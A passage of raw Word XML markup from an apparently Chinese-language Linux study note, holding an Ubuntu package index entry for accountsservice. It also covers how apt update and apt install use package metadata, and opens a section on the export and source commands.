          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r w:rsidRPr="00B03241">
        <w:rPr>
          <w:rFonts w:ascii="inherit" w:eastAsia="宋体" w:hAnsi="inherit" w:cs="宋体"/>
          <w:color w:val="9A6E3A"/>
          <w:kern w:val="0"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t>&gt;=</w:t>
      </w:r>
      <w:r w:rsidRPr="00B03241">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="宋体"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t xml:space="preserve"> 2.63.5</w:t>
      </w:r>
      <w:r w:rsidRPr="00B03241">
        <w:rPr>
          <w:rFonts w:ascii="inherit" w:eastAsia="宋体" w:hAnsi="inherit" w:cs="宋体"/>
          <w:color w:val="999999"/>
          <w:kern w:val="0"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
      <w:r w:rsidRPr="00B03241">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="宋体"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t xml:space="preserve">, libpolkit-gobject-1-0 </w:t>
      </w:r>
      <w:r w:rsidRPr="00B03241">
        <w:rPr>
          <w:rFonts w:ascii="inherit" w:eastAsia="宋体" w:hAnsi="inherit" w:cs="宋体"/>
          <w:color w:val="999999"/>
          <w:kern w:val="0"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r w:rsidRPr="00B03241">
        <w:rPr>
          <w:rFonts w:ascii="inherit" w:eastAsia="宋体" w:hAnsi="inherit" w:cs="宋体"/>
          <w:color w:val="9A6E3A"/>
          <w:kern w:val="0"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t>&gt;=</w:t>
      </w:r>
      <w:r w:rsidRPr="00B03241">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="宋体"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t xml:space="preserve"> 0.99</w:t>
      </w:r>
      <w:r w:rsidRPr="00B03241">
        <w:rPr>
          <w:rFonts w:ascii="inherit" w:eastAsia="宋体" w:hAnsi="inherit" w:cs="宋体"/>
          <w:color w:val="999999"/>
          <w:kern w:val="0"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="674BB380" w14:textId="77777777" w:rsidR="00B03241" w:rsidRPr="00B03241" w:rsidRDefault="00B03241" w:rsidP="009222EB">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000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B03241">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="宋体"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t xml:space="preserve">Recommends: default-logind </w:t>
      </w:r>
      <w:r w:rsidRPr="00B03241">
        <w:rPr>
          <w:rFonts w:ascii="inherit" w:eastAsia="宋体" w:hAnsi="inherit" w:cs="宋体"/>
          <w:color w:val="9A6E3A"/>
          <w:kern w:val="0"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t>|</w:t>
      </w:r>
      <w:r w:rsidRPr="00B03241">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="宋体"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t xml:space="preserve"> logind</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E321375" w14:textId="77777777" w:rsidR="00B03241" w:rsidRPr="00B03241" w:rsidRDefault="00B03241" w:rsidP="009222EB">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000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B03241">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="宋体"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t>Suggests: gnome-control-center</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4221672A" w14:textId="77777777" w:rsidR="00B03241" w:rsidRPr="00B03241" w:rsidRDefault="00B03241" w:rsidP="009222EB">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000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B03241">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="宋体"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t>Filename: pool/main/a/accountsservice/accountsservice_22.07.5-2ubuntu1.3_amd64.deb</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="167F932C" w14:textId="77777777" w:rsidR="00B03241" w:rsidRPr="00B03241" w:rsidRDefault="00B03241" w:rsidP="009222EB">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000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B03241">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="宋体"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t>Size: 69728</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="373DBB74" w14:textId="77777777" w:rsidR="00B03241" w:rsidRPr="00B03241" w:rsidRDefault="00B03241" w:rsidP="009222EB">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000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B03241">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="宋体"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t>MD5sum: a2acf0a225e2c30ccb985a66a4dfb848</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="564D1B05" w14:textId="77777777" w:rsidR="00B03241" w:rsidRPr="00B03241" w:rsidRDefault="00B03241" w:rsidP="009222EB">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000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B03241">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="宋体"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t>SHA1: 1c2b73bc5c72bc44cade5ef6fa444dbea1ea69ec</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67126C66" w14:textId="77777777" w:rsidR="00B03241" w:rsidRPr="00B03241" w:rsidRDefault="00B03241" w:rsidP="009222EB">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000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B03241">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="宋体"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t>SHA256: f8ed006eb680e9d8a9b55af88b3786f6892d6d2764586ec4853cf954da119596</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48D5803D" w14:textId="77777777" w:rsidR="00B03241" w:rsidRPr="00B03241" w:rsidRDefault="00B03241" w:rsidP="009222EB">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000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B03241">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="宋体"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t>SHA512: 9496d225169db5524f7bf9c0fb1cbdfac3ab6261b4725ed56c282d5865678881c8841c539a5b87182306ed66dcc9225a15986083dc72cf7433a30bf601507cc7</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41A56F50" w14:textId="77777777" w:rsidR="00B03241" w:rsidRPr="00B03241" w:rsidRDefault="00B03241" w:rsidP="009222EB">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000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B03241">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="宋体"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t>Homepage: https://www.freedesktop.org/wiki/Software/AccountsService/</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02AC3106" w14:textId="77777777" w:rsidR="00B03241" w:rsidRPr="00B03241" w:rsidRDefault="00B03241" w:rsidP="009222EB">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000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B03241">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="宋体"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t>Description: query and manipulate user account information</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22E1684E" w14:textId="77777777" w:rsidR="00B03241" w:rsidRPr="00B03241" w:rsidRDefault="00B03241" w:rsidP="009222EB">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000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B03241">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="宋体"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t>Task: ubuntu-desktop-minimal, ubuntu-desktop, ubuntu-desktop-raspi, kubuntu-desktop, xubuntu-core, xubuntu-desktop, lubuntu-desktop, ubuntustudio-desktop-core, ubuntustudio-desktop, ubuntukylin-desktop, ubuntu-mate-core, ubuntu-mate-desktop, ubuntu-budgie-desktop, ubuntu-budgie-desktop-raspi</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C6B49DC" w14:textId="77777777" w:rsidR="00B03241" w:rsidRPr="00B03241" w:rsidRDefault="00B03241" w:rsidP="009222EB">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000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B03241">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="宋体"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t>Description-md5: 8aeed0a03c7cd494f0c4b8d977483d7e</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7AFD5F60" w14:textId="77777777" w:rsidR="00B03241" w:rsidRPr="00B03241" w:rsidRDefault="00B03241" w:rsidP="009222EB">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000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B03241">
        <w:rPr>
          <w:rFonts w:ascii="inherit" w:eastAsia="宋体" w:hAnsi="inherit" w:cs="宋体"/>
          <w:color w:val="999999"/>
          <w:kern w:val="0"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t>......</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6540D9A3" w14:textId="77777777" w:rsidR="00B03241" w:rsidRPr="00B03241" w:rsidRDefault="00B03241" w:rsidP="009222EB">
      <w:pPr>
        <w:widowControl/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:jc w:val="left"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="inherit" w:eastAsia="宋体" w:hAnsi="inherit" w:cs="Noto Serif" w:hint="eastAsia"/>
          <w:color w:val="22313F"/>
          <w:kern w:val="0"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B03241">
        <w:rPr>
          <w:rFonts w:ascii="inherit" w:eastAsia="宋体" w:hAnsi="inherit" w:cs="Noto Serif"/>
          <w:color w:val="BBBBBB"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t>Bash</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03EA347C" w14:textId="77777777" w:rsidR="00B03241" w:rsidRPr="00B03241" w:rsidRDefault="00B03241" w:rsidP="009222EB">
      <w:pPr>
        <w:widowControl/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:jc w:val="left"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="inherit" w:eastAsia="宋体" w:hAnsi="inherit" w:cs="Noto Serif" w:hint="eastAsia"/>
          <w:color w:val="22313F"/>
          <w:kern w:val="0"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B03241">
        <w:rPr>
          <w:rFonts w:ascii="inherit" w:eastAsia="宋体" w:hAnsi="inherit" w:cs="Noto Serif"/>
          <w:color w:val="22313F"/>
          <w:kern w:val="0"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
        </w:rPr>
        <w:t>COPY</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4AEC2C99" w14:textId="77777777" w:rsidR="00B03241" w:rsidRPr="00B03241" w:rsidRDefault="00B03241" w:rsidP="009222EB">
      <w:pPr>
        <w:widowControl/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:after="384"/>
        <w:jc w:val="left"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Noto Serif" w:eastAsia="宋体" w:hAnsi="Noto Serif" w:cs="Noto Serif"/>
          <w:color w:val="22313F"/>
          <w:kern w:val="0"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B03241">
        <w:rPr>
          <w:rFonts w:ascii="Noto Serif" w:eastAsia="宋体" w:hAnsi="Noto Serif" w:cs="Noto Serif"/>
          <w:color w:val="22313F"/>
          <w:kern w:val="0"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
        </w:rPr>
        <w:t>然后</w:t>
      </w:r>
      <w:r w:rsidRPr="00B03241">
        <w:rPr>
          <w:rFonts w:ascii="Noto Serif" w:eastAsia="宋体" w:hAnsi="Noto Serif" w:cs="Noto Serif"/>
          <w:color w:val="22313F"/>
          <w:kern w:val="0"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
        </w:rPr>
        <w:t>apt</w:t>
      </w:r>
      <w:r w:rsidRPr="00B03241">
        <w:rPr>
          <w:rFonts w:ascii="Noto Serif" w:eastAsia="宋体" w:hAnsi="Noto Serif" w:cs="Noto Serif"/>
          <w:color w:val="22313F"/>
          <w:kern w:val="0"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
        </w:rPr>
        <w:t>再将</w:t>
      </w:r>
      <w:r w:rsidRPr="00B03241">
        <w:rPr>
          <w:rFonts w:ascii="Noto Serif" w:eastAsia="宋体" w:hAnsi="Noto Serif" w:cs="Noto Serif"/>
          <w:color w:val="22313F"/>
          <w:kern w:val="0"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
        </w:rPr>
        <w:t>Packages.gz</w:t>
      </w:r>
      <w:r w:rsidRPr="00B03241">
        <w:rPr>
          <w:rFonts w:ascii="Noto Serif" w:eastAsia="宋体" w:hAnsi="Noto Serif" w:cs="Noto Serif"/>
          <w:color w:val="22313F"/>
          <w:kern w:val="0"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
        </w:rPr>
        <w:t>里面的信息以某种数据结构形式导入本地数据库以便快速查找，即完成了</w:t>
      </w:r>
      <w:r w:rsidRPr="00B03241">
        <w:rPr>
          <w:rFonts w:ascii="Noto Serif" w:eastAsia="宋体" w:hAnsi="Noto Serif" w:cs="Noto Serif"/>
          <w:color w:val="22313F"/>
          <w:kern w:val="0"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
        </w:rPr>
        <w:br/>
        <w:t>“`apt update“`</w:t>
      </w:r>
      <w:r w:rsidRPr="00B03241">
        <w:rPr>
          <w:rFonts w:ascii="Noto Serif" w:eastAsia="宋体" w:hAnsi="Noto Serif" w:cs="Noto Serif"/>
          <w:color w:val="22313F"/>
          <w:kern w:val="0"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
        </w:rPr>
        <w:t>的一系列操作</w:t>
      </w:r>
      <w:r w:rsidRPr="00B03241">
        <w:rPr>
          <w:rFonts w:ascii="Noto Serif" w:eastAsia="宋体" w:hAnsi="Noto Serif" w:cs="Noto Serif"/>
          <w:color w:val="22313F"/>
          <w:kern w:val="0"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="00B03241">
        <w:rPr>
          <w:rFonts w:ascii="Noto Serif" w:eastAsia="宋体" w:hAnsi="Noto Serif" w:cs="Noto Serif"/>
          <w:color w:val="22313F"/>
          <w:kern w:val="0"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
        </w:rPr>
        <w:t>其后的</w:t>
      </w:r>
      <w:r w:rsidRPr="00B03241">
        <w:rPr>
          <w:rFonts w:ascii="Noto Serif" w:eastAsia="宋体" w:hAnsi="Noto Serif" w:cs="Noto Serif"/>
          <w:color w:val="22313F"/>
          <w:kern w:val="0"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
        </w:rPr>
        <w:t>`apt install`</w:t>
      </w:r>
      <w:r w:rsidRPr="00B03241">
        <w:rPr>
          <w:rFonts w:ascii="Noto Serif" w:eastAsia="宋体" w:hAnsi="Noto Serif" w:cs="Noto Serif"/>
          <w:color w:val="22313F"/>
          <w:kern w:val="0"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
        </w:rPr>
        <w:t>会借助上述</w:t>
      </w:r>
      <w:r w:rsidRPr="00B03241">
        <w:rPr>
          <w:rFonts w:ascii="Noto Serif" w:eastAsia="宋体" w:hAnsi="Noto Serif" w:cs="Noto Serif"/>
          <w:color w:val="22313F"/>
          <w:kern w:val="0"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
        </w:rPr>
        <w:t>Depends</w:t>
      </w:r>
      <w:r w:rsidRPr="00B03241">
        <w:rPr>
          <w:rFonts w:ascii="Noto Serif" w:eastAsia="宋体" w:hAnsi="Noto Serif" w:cs="Noto Serif"/>
          <w:color w:val="22313F"/>
          <w:kern w:val="0"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
        </w:rPr>
        <w:t>信息自动安装相关依赖，而源码安装则需要自己配置依赖了，所以现在十分不推荐使用</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="282DFDF1" w14:textId="0171FC9B" w:rsidR="006D1D5D" w:rsidRPr="00B03241" w:rsidRDefault="006D1D5D" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="30A5C495" w14:textId="77777777" w:rsidR="00BD0304" w:rsidRDefault="00BD0304" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7AC80F35" w14:textId="77777777" w:rsidR="00BD0304" w:rsidRDefault="00BD0304" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="25691871" w14:textId="77777777" w:rsidR="00BD0304" w:rsidRDefault="00BD0304" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0CF487B9" w14:textId="49EF2663" w:rsidR="000046B6" w:rsidRDefault="000046B6" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:bookmarkStart w:id="199" w:name="_Toc159779659"/>
      <w:r w:rsidRPr="000046B6">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">export </w:t>
      </w:r>
      <w:r w:rsidRPr="000046B6">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>和</w:t>
      </w:r>
      <w:r w:rsidRPr="000046B6">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> source</w:t>
      </w:r>
      <w:r w:rsidRPr="000046B6">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，</w:t>
      </w:r>
      <w:r w:rsidRPr="000046B6">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>bash</w:t>
      </w:r>
      <w:bookmarkEnd w:id="199"/>
    </w:p>
    <w:p w14:paraId="3F2CB4B9" w14:textId="19843F02" w:rsidR="000046B6" w:rsidRDefault="000046B6" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>参考链接：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E958C09" w14:textId="44949B83" w:rsidR="000046B6" w:rsidRDefault="000046B6" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="000046B6">
        <w:t>https://www.cnblogs.com/flying-tiger/p/5616934.html</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B8F9349" w14:textId="7B0687CC" w:rsidR="00624909" w:rsidRDefault="00624909" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:bookmarkStart w:id="200" w:name="_Toc159779660"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>export</w:t>
      </w:r>
      <w:bookmarkEnd w:id="200"/>
    </w:p>
    <w:p w14:paraId="6517C0F3" w14:textId="77777777" w:rsidR="00624909" w:rsidRDefault="00624909" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Linux export</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>命令用于设置或显示环境变量。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B522502" w14:textId="77777777" w:rsidR="00624909" w:rsidRDefault="00624909" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7962ABCB" w14:textId="0E15E52B" w:rsidR="00624909" w:rsidRPr="00624909" w:rsidRDefault="00624909" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>在</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>shell</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>中执行程序时，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>shell</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>会提供一组环境变量。</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>export</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>可新增，修改或删除环境变量，供后续执行的程序使用。同时，重要的一点是，</w:t>
      </w:r>
      <w:r w:rsidRPr="00624909">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:u w:val="single"/>
